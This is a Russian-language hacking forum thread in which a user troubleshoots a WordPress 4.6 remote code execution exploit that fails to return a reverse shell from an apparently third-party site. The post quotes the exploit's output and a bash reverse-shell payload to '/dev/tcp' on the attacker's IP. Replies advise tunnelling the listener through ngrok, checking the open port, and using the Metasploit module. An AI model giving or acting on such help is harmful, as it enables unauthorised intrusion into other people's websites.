• XSS.stack #1 – первый литературный журнал от юзеров форума

Подскажите по эксплойту. Реверс шелл не может достучаться к моей машине

CryNet

RAID-массив
Пользователь
Регистрация
25.07.2012
Сообщения
71
Реакции
10
Хочу попробовать проэксплуатировать эксплойт: WP 4.6 Remote Code Execution
Ссылка: https://exploitbox.io/exploit/wordpress-rce-exploit.sh
В самом файле меняю rev_host на свой: rev_host="192.168.0.4"
Сам таргет нужной версии, netcat в системе есть.
При запуске: ./wordpress-rce-exploit.sh site.com я вижу:
  • Кусок HTML-я
  • [+] Payload sent successfully
  • [+] Payload executed!
  • Waiting for the target to send us a reverse shell...
  • Кусок HTML-я
  • Warning: Inverse name lookup failed for `0.0.5.57'
  • Listening on any address 42627
И на этом процесс подвисает. Рядом создаётся файл rce.txt. Содержимое:
(sleep 3s && nohup bash -i >/dev/tcp/192.168.0.4/1337 0<&1 2>&1) &
Не подскажите в чём может быть дело? Вангую, что что-то не так с обратным доступом к моей машине и реверс-шелл не может достучаться.
 
Как бы 192.168.0.4 - Это твой локальный ip))
попробуй открыть порт через ngrok
Пробросил 1337 порт командой ngrok http 1337, в rev_host указал временный адресс, который выдал ngrok - не помогло
 
А точно порт открыт? Проверь https://hidemy.name/ru/port-scanner/
В Metasploit этот сплойт тоже есть. Если попробовать запустить сплойт там, то при указании сайта так - http://site.info/ и старта сплойта можно увидеть ошибку: Exploit failed: One or more options failed to validate: RHOSTS. А если указать просто site.info, то на автомате будет извлечён IP сайта, и увидеть уже другую ошибку: Is WordPress installed at http://xxx.xxx.xxx.xxx/ ? Ну а естественно там заглушка хостера и никакого WP нет.

А там точно http reverse shell нужен? Не tcp?
Как это определить наверняка?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх